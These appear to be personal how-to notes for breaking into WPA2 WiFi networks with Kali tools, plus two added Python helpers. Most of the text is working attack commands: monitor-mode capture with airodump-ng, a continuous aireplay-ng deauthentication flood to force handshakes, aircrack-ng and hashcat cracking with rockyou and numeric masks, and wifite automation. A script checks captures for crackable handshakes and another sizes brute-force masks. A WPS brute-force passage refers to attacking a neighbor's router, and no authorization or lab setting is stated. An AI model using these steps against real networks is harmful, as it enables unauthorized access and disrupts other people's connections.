Wifi Cracking
WLAN Adapter:
ALFA Network AWUS036ACH dual-band USB adapter (Realtek RTL8812AU chipset, hence the rtl8812au driver below)
INSTALL DRIVER & ACTIVATE MONITOR MODE:
CHECK FOR DEVICE:
$iwconfig
$lsusb
UPDATE:
$sudo apt update
$sudo apt upgrade -y
$sudo apt dist-upgrade -y
$sudo reboot now
$sudo apt update
INSTALL DRIVERS (either the Kali package or the build from source; the package alone is enough on a current Kali):
$sudo apt install realtek-rtl88xxau-dkms
Build from source instead (needs dkms and the headers for the running kernel):
$sudo apt install dkms
$git clone https://github.com/aircrack-ng/rtl8812au
$cd rtl8812au
$make
$sudo make install
UNPLUG THE ADAPTER, RECONNECT IT (PASS IT THROUGH TO THE VM AGAIN) AND CHECK THAT IT IS DETECTED:
$lsusb
$iwconfig
TEST:
$sudo airmon-ng start wlan0
$sudo wifite --wpa --kill
Cracking WiFi WPA2 Handshake
See interfaces:
ip addr
iwconfig
kill processes:
sudo airmon-ng check kill
Start monitor mode (airmon-ng renames the interface to wlan0mon; use that name in the commands below):
sudo airmon-ng start wlan0
Verify that monitor mode is used:
sudo airmon-ng
You could also use iwconfig to check that interface is in monitor mode:
iwconfig
Get the AP's MAC address and channel (Ctrl+C once the target is listed):
sudo airodump-ng wlan0mon
AP-MAC & channel:
- BSSID/MAC:
- CHANNEL:
SHOW ONLY A SINGLE BSSID (-d filters on the AP's MAC):
$ sudo airodump-ng wlan0mon -d A2:B5:3C:C1:F5:FC
1st window: capture on the target's channel and BSSID. Replace the channel number and BSSID with your own, and hack1 with any file prefix you like (capture1 or similar); airodump-ng appends -01.cap to it:
sudo airodump-ng -w hack1 -c 10 --bssid A2:B5:3C:C1:F5:FC wlan0mon
2nd window: deauth attack, so a connected client reconnects and redoes the 4-way handshake. Replace the BSSID with your own. A count of 0 keeps sending until Ctrl+C, so stop as soon as the 1st window shows "WPA handshake: A2:B5:3C:C1:F5:FC" in its top-right corner; add -c <client MAC> to target one client instead of broadcasting:
sudo aireplay-ng --deauth 0 -a A2:B5:3C:C1:F5:FC wlan0mon
Use Wireshark to open the capture file and check the handshake. A usable capture needs at least messages 1 and 2 (or 2 and 3) of the 4-way handshake between the AP and one client; running aircrack-ng on the file without -w also lists how many handshakes it found:
$ wireshark hack1-01.cap
Filter Wireshark messages for EAPOL:
eapol
Stop monitor mode (then start NetworkManager again, since airmon-ng check kill stopped it):
sudo airmon-ng stop wlan0mon
Crack the capture with rockyou or another wordlist. On Kali rockyou ships gzipped, so run sudo gunzip /usr/share/wordlists/rockyou.txt.gz first. Replace hack1-01.cap with your file name:
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
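To confirm that a capture really holds a crackable handshake without opening Wireshark, the following Python script (an added example, not part of these notes or of aircrack-ng) reads the .cap file airodump-ng writes (classic pcap, linktype 105; radiotap captures, linktype 127, are handled too), pulls out EAPOL-Key frames, classifies each as message 1 to 4 from its Key Information bits, and reports per AP/client pair whether M1+M2 with the same replay counter or M2+M3 with consecutive counters are present, the combinations aircrack-ng and hashcat can work with. The BSSID A2:B5:3C:C1:F5:FC is the one used in the notes above; the client addresses, nonces and MIC values in the built-in sample capture are constructed test data so the script runs offline.

```python
# Added example: check a monitor-mode capture for a crackable WPA2 4-way handshake.
# Reads classic pcap (linktype 105 as airodump-ng writes, or 127 radiotap), pulls
# EAPOL-Key frames, classifies M1..M4 and reports per AP/client pair whether
# M1+M2 (same replay counter) or M2+M3 (counter + 1) is present.
import struct
import sys
from collections import defaultdict

LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"  # LLC/SNAP + ethertype 0x888e

def mac(b): return ":".join(f"{x:02x}" for x in b)

def iter_pcap(data):
    """Yield (linktype, packet) from a classic pcap; the magic bytes set endianness."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":
        end = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(end + "I", data[20:24])[0]
    off = 24
    while off + 16 <= len(data):
        incl = struct.unpack(end + "IIII", data[off:off + 16])[2]  # ts_sec, ts_usec, incl, orig
        off += 16
        yield linktype, data[off:off + incl]
        off += incl

def classify(key_info):
    """Map Key Information flags (Ack 0x0080, MIC 0x0100, Secure 0x0200) to M1..M4."""
    ack, mic, secure = key_info & 0x0080, key_info & 0x0100, key_info & 0x0200
    if ack:
        return 3 if mic else 1
    return 4 if secure else 2

def parse_eapol_key(linktype, pkt):
    """Return (bssid, sta, msg_no, replay_counter, nonce, mic), or None if not EAPOL-Key."""
    if linktype == 127 and len(pkt) >= 4:  # radiotap: skip header by its LE length field
        pkt = pkt[struct.unpack("<H", pkt[2:4])[0]:]
    elif linktype != 105:
        return None
    if len(pkt) < 24 or (pkt[0] & 0x0C) != 0x08:  # only 802.11 data frames carry EAPOL
        return None
    to_ds, from_ds = pkt[1] & 0x01, pkt[1] & 0x02
    hdr = 24 + (6 if to_ds and from_ds else 0) + (2 if pkt[0] & 0x80 else 0)  # addr4, QoS
    if pkt[hdr:hdr + 8] != LLC_SNAP_EAPOL:
        return None
    eapol = pkt[hdr + 8:]
    if len(eapol) < 99 or eapol[1] != 3:  # type 3 = EAPOL-Key; 4-byte header + 95 fixed
        return None
    key_info = struct.unpack(">H", eapol[5:7])[0]
    replay = struct.unpack(">Q", eapol[9:17])[0]
    addr1, addr2 = pkt[4:10], pkt[10:16]
    bssid, sta = (addr2, addr1) if from_ds else (addr1, addr2)  # AP->STA or STA->AP
    return mac(bssid), mac(sta), classify(key_info), replay, eapol[17:49], eapol[81:97]

def check_handshakes(pcap_bytes):
    """Return {(bssid, sta): {"msgs": [...], "crackable": bool}} for every pair seen."""
    counters = defaultdict(lambda: defaultdict(set))
    for linktype, pkt in iter_pcap(pcap_bytes):
        rec = parse_eapol_key(linktype, pkt)
        if rec:
            bssid, sta, msg_no, replay, _nonce, _mic = rec
            counters[(bssid, sta)][msg_no].add(replay)
    report = {}
    for pair, rc in counters.items():
        m1m2 = bool(rc.get(1, set()) & rc.get(2, set()))  # M2 echoes M1's counter
        m2m3 = any(r + 1 in rc.get(3, set()) for r in rc.get(2, set()))  # M3 = M1 + 1
        report[pair] = {"msgs": sorted(rc), "crackable": m1m2 or m2m3}
    return report

# Constructed test capture (not real traffic): BSSID from the notes, made-up clients/nonces/MICs.
AP = bytes.fromhex("a2b53cc1f5fc")
STA_OK, STA_PARTIAL = bytes.fromhex("0011223344aa"), bytes.fromhex("0011223344bb")

def eapol_key_frame(from_ds, bssid, sta, key_info, replay, nonce, mic, key_data=b""):
    """Build an unencrypted 802.11 data frame carrying one EAPOL-Key message."""
    fc = bytes([0x08, 0x02 if from_ds else 0x01])  # data frame, FromDS / ToDS
    addrs = sta + bssid + bssid if from_ds else bssid + sta + bssid
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, replay) + nonce + bytes(32)
            + mic + struct.pack(">H", len(key_data)) + key_data)  # IV, RSC, key ID zeroed
    eapol = b"\x02\x03" + struct.pack(">H", len(body)) + body
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + LLC_SNAP_EAPOL + eapol

def build_sample_pcap():
    frames = [
        eapol_key_frame(True, AP, STA_OK, 0x008a, 1, bytes(range(32)), bytes(16)),  # M1
        eapol_key_frame(False, AP, STA_OK, 0x010a, 1, bytes(range(32, 64)), b"\x11" * 16, b"\x30\x00"),  # M2
        eapol_key_frame(True, AP, STA_PARTIAL, 0x008a, 7, bytes(range(32)), bytes(16)),  # M1 only
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)  # pcap global header
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for (bssid, sta), r in check_handshakes(data).items():
        print(f"{bssid} <-> {sta}: messages {r['msgs']} crackable={r['crackable']}")
```

Run it as `python3 check_handshake.py hack1-01.cap` (or on a wifite capture under hs/); without an argument it runs against the built-in sample and reports one complete pair and one client that only got as far as M1. Encrypted data frames are skipped automatically because their payload does not start with the plaintext LLC/SNAP header.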
Brute force WiFi WPA2 with GPU
Primarily you'll only have luck cracking WPS if the router is quite old and hasn't had any firmware updates (most people don't update their router firmware, so that's a good chance). Most, if not all, newer routers have brute-force protections against WPS, typically in the form of timeouts and locks (as you are seeing on your neighbor's router). When attacking WPS nowadays you need to use time modifiers (I don't know if wifite has that option, but bully and reaver do). Typically, in my experience from a couple of years ago, you had to put at minimum 30 seconds between each attempt, but I'm not sure what the standard would be nowadays for that.
WIFITE:
sudo wifite --wpa --kill
Ctrl+C
(choose NUM)
c (WPA handshake)
ls
cd hs
ls
Convert the capture for hashcat. -m 22000 expects the hc22000 format, which hcxpcapngtool (Kali package hcxtools) writes; cap2hccapx.bin writes the older .hccapx format for the deprecated -m 2500, so do not feed an .hccapx file to -m 22000:
sudo apt install hcxtools
hcxpcapngtool -o wpa2.hc22000 handshake_KitkatHouse_F8-CA-59-A0-79-3F_2022-12-29T22-22-06.cap
(legacy route: sudo /usr/share/hashcat-utils/cap2hccapx.bin handshake_KitkatHouse_F8-CA-59-A0-79-3F_2022-12-29T22-22-06.cap wpa2.hccapx, cracked with -m 2500 --deprecated-check-disable)
ls
HASHCAT: Install CUDA Toolkit: https://developer.nvidia.com/cuda-downloads
Copy wpa2.hc22000 to the Windows machine with the GPU, then:
cd Downloads
cd hashcat-6.2.6
hashcat.exe -I
hashcat.exe -m 22000 -a 3 wpa2.hc22000 ?d?d?d?d?d?d?d?d
(-I lists the detected OpenCL/CUDA devices; -a 3 is a mask attack, here every 8-digit string, the shortest passphrase WPA2 allows; for a wordlist run use -a 0 wpa2.hc22000 rockyou.txt instead)
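Before launching an -a 3 run it is worth knowing how big the mask is, because WPA2 hashing is slow (PBKDF2 with 4096 iterations) and a mask that is one character too wide turns minutes into centuries. The following Python helper (an added example, not part of these notes or of hashcat) counts the candidates of a hashcat mask from hashcat's built-in charset sizes, including custom charsets and the `??` escape, and converts that into run time for an assumed rate. The 500 kH/s figure is an illustrative assumption for a single mid-range GPU, not a measurement; substitute what `hashcat -b -m 22000` reports on your card.

```python
# Added example: size a hashcat -a 3 mask before running it against a WPA2 hash.
# Sizes of hashcat's built-in charsets: ?l ?u ?d ?s ?a ?b ?h ?H
BUILTIN_CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256, "h": 16, "H": 16}

def mask_keyspace(mask, custom_sizes=None):
    """Number of candidates a mask expands to.

    custom_sizes maps '1'..'4' to the size of the charsets given with -1 .. -4,
    e.g. {"1": 36} for -1 ?l?d. "??" is a literal question mark; any other
    plain character is a literal with exactly one choice.
    """
    custom_sizes = custom_sizes or {}
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            token = mask[i + 1]
            if token != "?":
                total *= custom_sizes.get(token) or BUILTIN_CHARSETS[token]
            i += 2
        else:
            i += 1
    return total

def eta_days(mask, rate_hs, custom_sizes=None):
    """Worst-case run time in days at rate_hs hashes per second (from hashcat -b -m 22000)."""
    return mask_keyspace(mask, custom_sizes) / rate_hs / 86400

if __name__ == "__main__":
    RATE = 500_000  # assumed WPA2 rate for one mid-range GPU; replace with your benchmark
    for mask, custom in [("?d?d?d?d?d?d?d?d", None),       # 8 digits, the mask from the notes
                         ("?u?l?l?l?l?l?d?d", None),       # Capital + 5 lowercase + 2 digits
                         ("?1?1?1?1?1?1?1?1", {"1": 36}),  # -1 ?l?d: lowercase alphanumeric
                         ("?a?a?a?a?a?a?a?a", None)]:      # full printable ASCII
        print(f"{mask:18} keyspace={mask_keyspace(mask, custom):.3e} "
              f"eta={eta_days(mask, RATE, custom):.2f} days")
```

The 8-digit mask from the notes is 10^8 candidates, a few minutes at the assumed rate, which is why it is the one brute-force mask worth trying first (many ISP routers ship numeric default keys); `?a` over 8 positions is about 6.6e15 and takes centuries on one card, so anything beyond digits needs a wordlist with rules rather than a mask. hashcat's own --keyspace option prints a work-distribution figure, not this candidate count, so do not compare the two directly.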